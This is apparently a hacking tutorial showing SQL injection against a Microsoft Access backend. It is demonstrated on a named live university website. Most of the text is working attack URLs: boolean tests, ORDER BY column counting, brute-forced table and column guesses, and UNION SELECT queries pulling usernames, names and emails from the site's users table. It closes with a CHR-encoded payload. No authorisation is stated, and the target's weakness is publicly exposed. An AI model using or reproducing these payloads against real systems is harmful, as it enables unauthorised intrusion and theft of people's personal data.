MICROSOFT ACCESS SQL INJECTION

MICROSOFT ACCESS SQL INJECTION
Here I will show you how to perform SQL injection against MSACCESS database :)
As we know MS_ACCESS have no information_schema so we have to brute force almost everything :p
same like Mysql<=4 :)
For better understanding , I am gonna perform injection on live site *_*
Here we goes ,
SITE: http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12

lets check its false positive or not,

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1>1 (error *_* )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2 (Error)

 Its integer based, lets start injection now  ;)

Lets Find number of columns by simple order by statement,

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1 ( no error )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 3 (no error)
.
.
.
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7 (Error)

so here number of columns are 6 :)
 we cant use union select statement unless we   know at least one table_name.
Lets find Table_name First. As I already mentioned MS_ACCESS have no information_schema, so we have to guess Table names here is your Query :)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [hii] and 1=1

here is your result as "hii" is not a valid table_name :)


Now replace a "hii" with some common table names,
 I   highly recommended you to use some automated tools or script to do this, because its some what annoying process. :/ & time consuming too . I had written python script for this , I will publish it soon ;)

For now lets do it manually ;

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [admin] and 1=1
...................... ( ERROR)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [tbl_user] and 1=1 ............................(ERROR)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [users] and 1=1 .......... ( BINGO!!!!!! NO ERROR) *_*

So, its indicate that table "users" exists in the database :)

Same procedure we can follow to find columns, here is our Query :)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([hii]) from [users]) and 1=1
 now replace "hii" with different column_names, & repeat whole procedure again hope you understand :)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12and 0<=(select count([id]) from [users]) and 1=1
.............( NO ERROR)

after spending a lot time on column names I found " id , name,email " as a columns for table "users"

NOW LETS DO IT UNION BASED,

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
............................(HERE WE MUST HAVE TO MENTION THE TABLE NAME )


here we got vulnerable column 2.

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users

Lets extract some data from table "user" where columns names are " id, name, & email, username " ;)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,username,3,4,5,6 from users

Once I posted this as a challenge on "Web InJ3ct0rs-SQL, XSS, LDAP, XPATH ,XML ,R/LFI Injections"
I got a different solutions from Others, m gonna share one of it with you..

Thanx to Janus Slovan for his solution, :)

http://www.cityuniversity.edu.pk/cusitnew/news.php?id=-2%20UnIoN%20aLL%20SeLeCt%201,%20%20left(date(),10)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20CHR(106)%20%2b%20CHR(97)%20%2b%20CHR(110)%20%2b%20CHR(117)%20%2b%20CHR(115)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20username%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20name,3,4,5,6%20from%20users